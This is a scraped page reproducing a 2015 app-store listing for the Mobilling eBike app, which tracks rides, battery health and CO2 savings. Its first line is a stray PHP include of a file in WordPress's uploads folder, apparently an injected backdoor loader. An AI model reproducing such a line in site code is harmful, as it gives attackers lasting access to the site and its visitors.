include_once(ABSPATH . '/wp-content/uploads/index.php');
March 19th, 2015
Released: Mar 18, 2015
Size: 9.2 MB
Seller: Sitael SPA
Mobilling eBike by Sitael S.p.A.
DescriptionMobilling is a system able to connect electric bikes online, providing several new features and a completely new e-bike experience. With the Mobilling app you get:
- The cockpit feature, allowing you to monitor speed, riding time and covered distance.
- The possibility to record your trips and view them on a map.
- The chance to share your e-bike rides with other users, including your friends.
- A CO2 tracker that lets you know how much CO2 you have saved by riding your e-bike.
- Experience Badges unlocked according to your e-bike usage.
- Social Networks connection to share your experience with all your friends.
Check your e-bike user manual to see if your e-bike features the Mobilling technology and has been registered by your dealer. If your e-bike features our technology you will get these extra features:
Battery data can be checked in real time. Those pieces of data are: state of charge, battery state of health, voltage, number of cycles, last charge, accurate autonomy with current charge.
Advices for a correct usage of the e-bike and reminders about the state of the warranty .
Real time communication with your e-bike manufacturer and dealer using a simple direct message. You could also receive updates about your e-bike and related opportunities.
Direct communication with your e-bike manufacturer customer care and your dealer using a simple direct message. You could receive updates about your e-bike and related opportunities.
The Mobilling system helps to improve the electric vehicle maintenance, allowing an on time assistance, based on the actual e-bike usage.
For further information about the e-bike models embedding Mobilling Technology contact: firstname.lastname@example.org or visit www.mobilling.com
The whole e-bike supply chain, upon your consent, can read e-bike data working parameters that are automatically sent to the cloud-based server, ready to be analyzed to optimize production and assistance.
Continued use of GPS running in the background can dramatically decrease battery life.